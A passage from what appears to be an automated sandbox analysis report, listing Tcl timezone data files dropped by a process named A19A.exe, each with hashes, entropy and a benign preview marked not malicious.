                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Anguilla) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):202
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.90033942341457
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290//MFe90e/:MBaIMY9QpI290//V90O
                                                                                                                                                                                                                                                                                                                                MD5:25CA3996DDB8F1964D3008660338BA72
                                                                                                                                                                                                                                                                                                                                SHA1:B66D73B5B38C2CCCA78232ADC3572BBBEB79365D
                                                                                                                                                                                                                                                                                                                                SHA-256:A2ABBD9BCFCE1DB1D78C99F4993AC0D414A08DB4AC5CE915B81119E17C4DA76F
                                                                                                                                                                                                                                                                                                                                SHA-512:A25AFE4FD981F458FE194A5D87C35BE5FC7D4426C1EEE8311AE655BB53364CD4AAC0710C0D7E6A91C0F248E2A6916902F4FD43A220CFF7A6474B77D93CF35C81
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Antigua) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1722
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6435096006301833
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5s4h19U2dBUGrmO7XGtN3kh0VKnNIVkHZU7WWhKRWRN:Cm19U2zUGrpzGtVE0VKnyVkHZWWWhKRG
                                                                                                                                                                                                                                                                                                                                MD5:6349567E3ED0FD11DD97056D2CFF11EE
                                                                                                                                                                                                                                                                                                                                SHA1:404F1B311D7072A6372351366BA15BB94F3AC7D2
                                                                                                                                                                                                                                                                                                                                SHA-256:41C816E9C0217A01D9288014013CD1D315B2CEB719F8BB310670D02B664A4462
                                                                                                                                                                                                                                                                                                                                SHA-512:782910DFA0FF8FEDB94D622271FA0FF983BC50A4FEE95FFC8EC3E89FB123B82C26701D81A994A8248F1C1CA0B1EF49C2752C4D7B498A0A623D79E2B6753DA432
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Araguaina) {. {-9223372036854775808 -11568 0 LMT}. {-1767214032 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-191365200 -7200 1 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}. {592974000 -7200 1 -03}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1981
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6790048972731686
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5Wcap0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWvXydhSTP:vC0ZB9yRwhS+/po/lKENURMo8XvCWvX1
                                                                                                                                                                                                                                                                                                                                MD5:93B8CF61EDC7378C39BE33A77A4222FC
                                                                                                                                                                                                                                                                                                                                SHA1:8A01D2B22F8FC163B0FDCED4305C3FA08336AF7D
                                                                                                                                                                                                                                                                                                                                SHA-256:35E05545A12E213DCBC0C2F7FDCA5C79CD522E7D2684EDF959E8A0A991BEF3C8
                                                                                                                                                                                                                                                                                                                                SHA-512:68333AB0C9348AF0994DB26FB6D34FF67ABF56AF1FBABB77F2C9EFF20E9A2DB2B59C5B81DF0C42299DE459B03DF13E07071B84576E62597920D1848F1E1FC9E3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Buenos_Aires) {. {-9223372036854775808 -14028 0 LMT}. {-2372097972 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-73378
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2009
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6543367491742913
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5f4p0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWg7ydhSTK+:No0ZB9yRwhS+/po/lKENURMo8XvCWg7r
                                                                                                                                                                                                                                                                                                                                MD5:7FCA355F863158D180B3179782A6E8C8
                                                                                                                                                                                                                                                                                                                                SHA1:CDFBC98923F7315388009F22F9C37626B677321F
                                                                                                                                                                                                                                                                                                                                SHA-256:C3FE34E5BE68503D78D63A2AFB5C970584D0854C63648D7FE6E2412A4E5B008F
                                                                                                                                                                                                                                                                                                                                SHA-512:6C2F9598C714BEBA7A538AAB7FA68C1962001C426C80B21F2A9560C72BCEA87B956821E68AF30B4576C1ECDB07E33D616934BD49943DA2E45841B10D483833C5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Catamarca) {. {-9223372036854775808 -15788 0 LMT}. {-2372096212 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-73378080
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):237
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.672788403288451
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MMXAIVAIgp/MMXs290/MquQ90/MMXAv:MBaIMY/Mhp/MP290/MquQ90/MH
                                                                                                                                                                                                                                                                                                                                MD5:42D568B6100D68F9E5698F301F4EC136
                                                                                                                                                                                                                                                                                                                                SHA1:E0A5F43A80EB0FAAFBD45127DCAF793406A4CF3A
                                                                                                                                                                                                                                                                                                                                SHA-256:D442E5BBB801C004A7903F6C217149FCDA521088705AC9FECB0BC3B3058981BF
                                                                                                                                                                                                                                                                                                                                SHA-512:99580239B40247AF75FFAA44E930CDECB71F6769E3597AC85F19A8816F7D0859F6A0D5499AFAC2FA35C32BA05B75B27C77F36DE290DD0D442C0769D6F41E96DA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Catamarca)]} {. LoadTimeZoneFile America/Argentina/Catamarca.}.set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1976
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.659938468164974
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5zxpp0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWg7ydhSTP:1xT0ZB9yRwhS+/po/lKENURMo8XvCWgJ
                                                                                                                                                                                                                                                                                                                                MD5:C6A4EED52A2829671089F9E84D986BFB
                                                                                                                                                                                                                                                                                                                                SHA1:F5BBDD0C3347C7519282249AA48543C01DA95B7A
                                                                                                                                                                                                                                                                                                                                SHA-256:50541A1FBACAD2C93F08CD402A609C4984AF66E27DB9FAA7F64FDA93DDC57939
                                                                                                                                                                                                                                                                                                                                SHA-512:52EA5BB27C91C753275EAC90E082EEBE98B5997B830D8DD579174558355E3FED0AAF4AA02679B0866591951F04F358AFB113423872D57820143E75FEB4415B60
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Cordoba) {. {-9223372036854775808 -15408 0 LMT}. {-2372096592 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1974
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.659895575974408
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5rCp0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCfSWnzydhSR:FK0ZB9yRwhS+/po/lKENURMo8XvCfbzD
                                                                                                                                                                                                                                                                                                                                MD5:A7F2318729F0B4B04C9176CB5257691E
                                                                                                                                                                                                                                                                                                                                SHA1:0EAD91CBDC640DB67F64A34209359674AC47062A
                                                                                                                                                                                                                                                                                                                                SHA-256:E33962F99E6022ED1825898990B38C10F505DE6EC44DAFB00C75E3A7C1A61C8A
                                                                                                                                                                                                                                                                                                                                SHA-512:CB80580383309CCA4837556ED0444F2B931E1B3B13582023BFB715393C94C4F1279D8EC18CACB06BB13E3D32A535495DF2D093E225DF7B6DFFD3571A3B3573B2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Jujuy) {. {-9223372036854775808 -15672 0 LMT}. {-2372096328 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800 -1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2037
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.655968476161033
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5J6p0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWXXydhSTK+:Hi0ZB9yRwhS+/po/lKENURMo8XvCWXXr
                                                                                                                                                                                                                                                                                                                                MD5:49BB6DAD5560E7C6EAEA6F3CF9EB1F67
                                                                                                                                                                                                                                                                                                                                SHA1:56E0D9DD4E6B12522A75F0ABFEBB6AE019614CB5
                                                                                                                                                                                                                                                                                                                                SHA-256:13CBECD826DD5DE4D8576285FC6C4DE39F2E9CF03F4A61F75316776CAED9F878
                                                                                                                                                                                                                                                                                                                                SHA-512:CA7EF1A94A6635EAB644C5EAAC2B890E7401745CFA97609BDA410D031B990C87EB2F97160731A45B5A8ADE48D883EAB529AE2379406852129102F0FDF92247D8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/La_Rioja) {. {-9223372036854775808 -16044 0 LMT}. {-2372095956 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2009
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.649537276151328
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5Yep0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCpSGSldhSTS:C+0ZB9yRwhS+/po/lKENURMo8XvCpVap
                                                                                                                                                                                                                                                                                                                                MD5:69F8A1AC33BE03C008EC5FEBD1CE4CAA
                                                                                                                                                                                                                                                                                                                                SHA1:858362EFEA0C68C1EC9295A9FCE647B41DBF429D
                                                                                                                                                                                                                                                                                                                                SHA-256:B02DDE8DCF8E68B2B1DBF66ADF5B247E9833FEC347DFBC487C391FADA5706AD3
                                                                                                                                                                                                                                                                                                                                SHA-512:8373EAEEBF5EA028CC0673B10E9DFE84F4DFC2F9E9E8320D59E6CE6125643B31F5E61FC894E420A8D7E9C2FF242617DF911ABF0884AF5B32316A098C8524772D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Mendoza) {. {-9223372036854775808 -16516 0 LMT}. {-2372095484 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2012
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6703415662732746
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5mpp0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWvXydhSTK+:oT0ZB9yRwhS+/po/lKENURMo8XvCWvXr
                                                                                                                                                                                                                                                                                                                                MD5:AC8E561F7573280594BDD898324E9442
                                                                                                                                                                                                                                                                                                                                SHA1:7DC6248ED29719700189FF3A69D06AAC7B54EB6B
                                                                                                                                                                                                                                                                                                                                SHA-256:0833962C0DE220BC601D764EE14442E98F83CB581816B74E5867540348227250
                                                                                                                                                                                                                                                                                                                                SHA-512:2FDD23ABA891EBEF01944F3C8F1A9E6844C182B0EB2CBEC0F942F268BAE51F0D7775370E262B500FE7151210F8849DD54BA5CEB2160AE03A5747A48A10933F05
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Rio_Gallegos) {. {-9223372036854775808 -16612 0 LMT}. {-2372095388 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-73378
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1945
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.653135248071002
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5Vgp0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWg7ydhSTQO:7w0ZB9yRwhS+/po/lKENURMo8XvCWg7D
                                                                                                                                                                                                                                                                                                                                MD5:70FB90E24FEEF5211C9488C938295F02
                                                                                                                                                                                                                                                                                                                                SHA1:5C903A669B51A1635284AD80877E0C6789D8EB26
                                                                                                                                                                                                                                                                                                                                SHA-256:FBDACFA5D82DC23ECDD9D9F8A4EF71F7DBB579BF4A621C545062A7AE0296141D
                                                                                                                                                                                                                                                                                                                                SHA-512:4C36B34B2203F6D4C78CC6F0E061BF35C4B98121D50096C8015EBA6DBEFA989DD2F2E32436EEE3055F1CF466BC3D4FD787A89873EEE4914CB51B273E335C90C3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Salta) {. {-9223372036854775808 -15700 0 LMT}. {-2372096300 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800 -1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2037
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6597750686514887
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5jXup0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWXXydhSTH:1+0ZB9yRwhS+/po/lKENURMo8XvCWXXh
                                                                                                                                                                                                                                                                                                                                MD5:BBB4D4B341E7FEC2E5A937267AADCD0F
                                                                                                                                                                                                                                                                                                                                SHA1:9AB509F97DCBAAE5ACA7F67853E86429438ED8DC
                                                                                                                                                                                                                                                                                                                                SHA-256:BAC6CC41865DD3D4F042FE6106176279F3DEB9127BE0146AF75AE1E47098AF43
                                                                                                                                                                                                                                                                                                                                SHA-512:49E32BD5BDBA773D99C883080660B431E8D4C806164C0354C848CF3AB0042797DBE7F6226BA234634A1DF254B0464ED5F714B054454520263536B0A77D7053D9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Juan) {. {-9223372036854775808 -16444 0 LMT}. {-2372095556 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2013
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6516068215670687
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:58kp0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCp1ESWn0SK4:K80ZB9yRwhS+/po/lKENURMo8XvCpmTr
                                                                                                                                                                                                                                                                                                                                MD5:767F99822C382327A318EAC0779321F3
                                                                                                                                                                                                                                                                                                                                SHA1:1352B21F20C7F742D57CB734013143C9B58DA221
                                                                                                                                                                                                                                                                                                                                SHA-256:B4590DF5AC1993E10F508CC5183809775F5248B565400BA05AE5F87B69D4E26B
                                                                                                                                                                                                                                                                                                                                SHA-512:C8FF21DC573DE5CB327DDA536391071012A038B8266C4E39922EC0F0EC975000E5D7AFBBE81D1C28DB8733E8B01E1E4D6BE0968D9EFCFC50DB102CC09BDABEA6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Luis) {. {-9223372036854775808 -15924 0 LMT}. {-2372096076 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2036
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.653313944168433
                                                                                                                                                                                                                                                                                                                                Encrypted:false
